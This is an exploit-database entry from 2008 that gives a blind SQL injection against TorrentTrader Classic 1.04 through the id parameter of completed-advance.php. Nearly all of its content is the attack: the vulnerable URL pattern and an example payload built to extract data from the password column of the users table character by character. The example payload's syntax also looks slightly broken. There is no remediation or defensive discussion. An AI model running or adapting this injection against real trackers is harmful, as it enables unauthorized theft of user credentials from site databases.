id: 3854
date: 10/06/2008
title: TorrentTrader Classic <= 1.04 Blind SQL Injection Vulnerability
author: BazOka-HaCkEr
cves: 

===============================================================
TorrentTrader Classic <= 1.04 Blind SQL Injection Vulnerability
===============================================================


======================================================
 
==> TorrentTrader Classic <= 1.04 Blind SQL Injection Exploit
 
======================================================
 
==> NamE      : TorrentTrader Classic
 
==> version    : 1.04
 
==> Download : www.torrenttrader.org
 
======================================================
 
==> AuThOr : BazOka-HaCkEr
 
======================================================
 
==> ExplO!te :
 
==> www.TarGeT.com/paTh/completed-advance.php?id=[SQL]
 
==> ExampLe :
 
==> www.TarGeT.com/tracker/completed-advance.php?id=180+AND ascii(SUBSTRING((SELECT Count(password) FROM users LIMIT 1,1)1,1)
 
======================================================



#  0day.today [2023-03-25]  #